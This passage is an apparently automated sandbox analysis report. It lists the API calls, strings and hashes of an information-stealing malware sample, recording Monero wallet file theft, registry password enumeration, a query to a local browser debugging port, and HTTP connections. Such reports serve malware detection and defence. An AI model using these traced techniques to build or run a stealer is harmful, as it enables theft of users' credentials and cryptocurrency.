                                            • lstrcat.KERNEL32(?,006D6FD8), ref: 024047EA
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                              • Part of subcall function 02409187: GetFileAttributesA.KERNEL32(00000000,?,023F1DFB,?,?,00425784,?,?,00420E22), ref: 02409196
                                              • Part of subcall function 023FA697: StrStrA.SHLWAPI(00000000,00421360), ref: 023FA6F0
                                              • Part of subcall function 023FA697: memcmp.MSVCRT(?,00421244,00000005), ref: 023FA749
                                              • Part of subcall function 023FA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023FA3A3
                                              • Part of subcall function 023FA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023FA3C8
                                              • Part of subcall function 023FA377: LocalAlloc.KERNEL32(00000040,?), ref: 023FA3E8
                                              • Part of subcall function 023FA377: ReadFile.KERNEL32(000000FF,?,00000000,023F16F6,00000000), ref: 023FA411
                                              • Part of subcall function 023FA377: LocalFree.KERNEL32(023F16F6), ref: 023FA447
                                              • Part of subcall function 023FA377: CloseHandle.KERNEL32(000000FF), ref: 023FA451
                                              • Part of subcall function 024097B7: GlobalAlloc.KERNEL32(00000000,02404894,02404894), ref: 024097CA
                                            • StrStrA.SHLWAPI(?,006D6AD8), ref: 024048AA
                                            • GlobalFree.KERNEL32(?), ref: 024049C9
                                              • Part of subcall function 023FA477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023F51A5,00000000,00000000), ref: 023FA4A6
                                              • Part of subcall function 023FA477: LocalAlloc.KERNEL32(00000040,?,?,?,023F51A5,00000000,?), ref: 023FA4B8
                                              • Part of subcall function 023FA477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023F51A5,00000000,00000000), ref: 023FA4E1
                                              • Part of subcall function 023FA477: LocalFree.KERNEL32(?,?,?,?,023F51A5,00000000,?), ref: 023FA4F6
                                              • Part of subcall function 023FA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 023FA7E4
                                            • lstrcat.KERNEL32(?,00000000), ref: 0240495A
                                            • StrCmpCA.SHLWAPI(?,004208D2), ref: 02404977
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 02404989
                                            • lstrcat.KERNEL32(00000000,?), ref: 0240499C
                                            • lstrcat.KERNEL32(00000000,00420FA0), ref: 024049AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                            • Instruction ID: 6da35515853408f879d50e4e2d5da6309113e8ca8c90edb3edca693a40bf9995
                                            • Opcode Fuzzy Hash: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                            • Instruction Fuzzy Hash: 797136B1D00218ABDB14EBB0DD89FDE777AAF88300F0445A9E60997190EB35DB88CF51
                                            APIs
                                            • memset.MSVCRT ref: 00401327
                                              • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                              • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                              • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                              • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                              • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                            • lstrlenA.KERNEL32(?), ref: 0040135C
                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                            • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                            • memset.MSVCRT ref: 00401516
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                            • API String ID: 1930502592-218353709
                                            • Opcode ID: d8bec970428073cf6ec4cbc59b09ffa759b31b549548e7bcf4fc66ef27a547a5
                                            • Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
                                            • Opcode Fuzzy Hash: d8bec970428073cf6ec4cbc59b09ffa759b31b549548e7bcf4fc66ef27a547a5
                                            • Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                            • HeapAlloc.KERNEL32(00000000), ref: 00405021
                                            • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                            • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
                                            • InternetCloseHandle.WININET(+aA), ref: 00405109
                                            • InternetCloseHandle.WININET(?), ref: 00405116
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                            • String ID: +aA$+aA
                                            • API String ID: 3894370878-2425922966
                                            • Opcode ID: 680d6db2701a830b3541bb914142e2be9b5bc6df679bd0b26afa8e477f43dac8
                                            • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                            • Opcode Fuzzy Hash: 680d6db2701a830b3541bb914142e2be9b5bc6df679bd0b26afa8e477f43dac8
                                            • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D
                                            APIs
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
                                              • Part of subcall function 023F4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
                                              • Part of subcall function 023F4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 023F4BCC
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F4BF1
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023F4D71
                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,00421AB8,00000000,?,006D6F14), ref: 023F509F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 023F50BB
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 023F50CF
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023F5100
                                            • InternetCloseHandle.WININET(00000000), ref: 023F5164
                                            • InternetCloseHandle.WININET(00000000), ref: 023F517C
                                            • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 023F4DCC
                                              • Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
                                              • Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
                                              • Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89
                                              • Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C
                                              • Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
                                              • Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9
                                            • InternetCloseHandle.WININET(00000000), ref: 023F5186
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID:
                                            • API String ID: 2402878923-0
                                            • Opcode ID: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                            • Instruction ID: ab04d963dfd03b49e0c8d4d58da79892173cf5541b63aaae3feb67c726f35c2c
                                            • Opcode Fuzzy Hash: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                            • Instruction Fuzzy Hash: 3912F372951328AACB15EB91DC95FEEB77AAF54701F5041AEE246620D0EF702F88CF50
                                            APIs
                                              • Part of subcall function 0240AD17: lstrcpy.KERNEL32(?,00000000), ref: 0240AD5D
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AA1
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4AB8
                                              • Part of subcall function 023F4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023F4ACF
                                              • Part of subcall function 023F4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023F4AF0
                                              • Part of subcall function 023F4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 023F4B00
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 023F6598
                                            • StrCmpCA.SHLWAPI(?,006D6E80), ref: 023F65BA
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023F65EC
                                            • HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 023F663C
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 023F6676
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 023F6688
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 023F66B4
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023F6724
                                            • InternetCloseHandle.WININET(00000000), ref: 023F67A6
                                            • InternetCloseHandle.WININET(00000000), ref: 023F67B0
                                            • InternetCloseHandle.WININET(00000000), ref: 023F67BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID:
                                            • API String ID: 3074848878-0
                                            • Opcode ID: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                            • Instruction ID: b28758cf2eda0db73f63ba32414ca023dedc019617c76e6822729af8bb7a0eae
                                            • Opcode Fuzzy Hash: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                            • Instruction Fuzzy Hash: D6714471A00318EBDB14DF90DC89FEDB779AF44701F1041A9E6066B5D0EBB56A84CF51
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02409463
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID:
                                            • API String ID: 2244384528-0
                                            • Opcode ID: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                            • Instruction ID: 99cbba8816a3cafbdd3f7db7de2a391a679c81bb50ad98a0a4a2bcf7846ff493
                                            • Opcode Fuzzy Hash: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                            • Instruction Fuzzy Hash: 5A710A71E05208ABCB14EFE4DC84FEEB779BF48700F10851AF615A7294EB34A944CB61
                                            APIs
                                              • Part of subcall function 023F9CB7: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 023F9CD1
                                            • memset.MSVCRT ref: 023F9E9A
                                            • lstrcat.KERNEL32(?,004212A8), ref: 023F9EAF
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F9EC5
                                            • memset.MSVCRT ref: 023F9F01
                                            • lstrcat.KERNEL32(?,004212BC), ref: 023F9F16
                                            • lstrcat.KERNEL32(?,004212C4), ref: 023F9F28
                                            • lstrcat.KERNEL32(?,?), ref: 023F9F3C
                                            • lstrcat.KERNEL32(?,004212C8), ref: 023F9F4E
                                            • lstrcat.KERNEL32(?,?), ref: 023F9F62
                                            • lstrcat.KERNEL32(?,004212CC), ref: 023F9F74
                                            • lstrlen.KERNEL32(00000000), ref: 023F9F7E
                                            • lstrlen.KERNEL32(00000000), ref: 023F9F8D
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            • memset.MSVCRT ref: 023F9FE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                            • String ID:
                                            • API String ID: 689835475-0
                                            • Opcode ID: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                            • Instruction ID: f2c145b9e5e391d049e563a01f288bb0397bea93aed75b24d3d57b6e8151da3a
                                            • Opcode Fuzzy Hash: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                            • Instruction Fuzzy Hash: 5C515175D00618EBCB14EBE0EC95FEE7739BF14302F404599F609A61A0EB759648CF61
                                            APIs
                                            • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                            • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$Open$CloseHandle
                                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                            • API String ID: 3289985339-2144369209
                                            • Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                            • Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
                                            • Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                            • Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68
                                            APIs
                                              • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                              • Part of subcall function 00407330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                              • Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                              • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                              • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                              • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                            • lstrcatA.KERNEL32(00000000,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 004076A8
                                            • lstrcatA.KERNEL32(00000000, : ), ref: 004076BA
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076EF
                                            • lstrcatA.KERNEL32(00000000,00421934), ref: 00407700
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407733
                                            • lstrcatA.KERNEL32(00000000,00421938), ref: 0040774D
                                            • task.LIBCPMTD ref: 0040775B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                            • String ID: :
                                            • API String ID: 3191641157-3653984579
                                            • Opcode ID: 0536b009d8054fa3c231f647c939fffcb73d7f139e9b4279ea2affdd8fc55253
                                            • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                            • Opcode Fuzzy Hash: 0536b009d8054fa3c231f647c939fffcb73d7f139e9b4279ea2affdd8fc55253
                                            • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                            APIs
                                            • lstrcpy.KERNEL32(?,?), ref: 02401892
                                              • Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202
                                              • Part of subcall function 02409657: StrStrA.SHLWAPI(\nm,00000000,00000000,?,023FA1D8,00000000,006D6E5C,00000000), ref: 02409663
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024018CE
                                              • Part of subcall function 02409657: lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,023FA1D8,00000000,006D6E5C), ref: 02409687
                                              • Part of subcall function 02409657: lstrlen.KERNEL32(00000000,?,023FA1D8,00000000,006D6E5C), ref: 0240969E
                                              • Part of subcall function 02409657: wsprintfA.USER32 ref: 024096BE
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02401916
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0240195E
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024019A5
                                            • lstrcpy.KERNEL32(?,00000000), ref: 024019ED
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02401A35
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02401A7C
                                            • lstrcpy.KERNEL32(?,00000000), ref: 02401AC4
                                              • Part of subcall function 0240AD97: lstrlen.KERNEL32(023F51BC,?,?,023F51BC,00420DDF), ref: 0240ADA2
                                              • Part of subcall function 0240AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0240ADFC
                                            • strtok_s.MSVCRT ref: 02401C07
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                            • String ID:
                                            • API String ID: 4276352425-0
                                            • Opcode ID: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                            • Instruction ID: d458d0e8c35ce7f04e1e02dddc3ff500b463d4ea7e50c71aa6ee7f597a2a436b
                                            • Opcode Fuzzy Hash: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                            • Instruction Fuzzy Hash: AD7141B2D012189BCB15EB61DCC8EEE737AAF54700F0449AEE509A61C1EF759AC48F61
                                            APIs
                                            • memset.MSVCRT ref: 00407374
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                            • RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                              • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                            • task.LIBCPMTD ref: 004075B5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                            • String ID: Password
                                            • API String ID: 2698061284-3434357891
                                            • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                            • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                            • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                            • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02407939
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02407976
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 024079FA
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02407A01
                                            • wsprintfA.USER32 ref: 02407A37
                                              • Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\
                                            • API String ID: 1544550907-3809124531
                                            • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction ID: 0bbd086fb0c11fefcc276fc7a349e1b1bce8fe173da6eda3184ecd627be56d7f
                                            • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction Fuzzy Hash: ED4161B1D05258ABDB10DF94CC85FDEBBB9AF48700F0441AAE509672C0D7756B84CFA6
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00A70BB0,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00A70BB0,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
